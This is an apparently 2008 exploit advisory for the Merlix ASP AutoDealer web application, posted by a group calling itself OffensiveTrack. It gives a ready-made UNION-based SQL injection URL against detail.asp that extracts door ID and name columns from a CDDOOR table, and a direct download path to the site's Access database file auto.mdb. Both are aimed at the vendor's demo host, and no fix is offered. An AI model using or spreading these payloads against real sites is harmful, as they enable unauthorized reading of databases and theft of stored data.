ASP AutoDealer (SQL-DD) Multiple Remote Vulnerabilities

2008-12-05 22:30:04

###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


---------------------------- Tunisia Muslim ------------------------------

#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org

#contact : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script : Merlix ASP AutoDealer
#download : null
#Demo : http://demo.merlix.com/autodealer/



#Exploits :

--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR



--=[DATABASE DISCLOSURE]=--
http://demo.merlix.com/autodealer/auto.mdb


#Greetz For -|-Me!sTeR-|-

###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.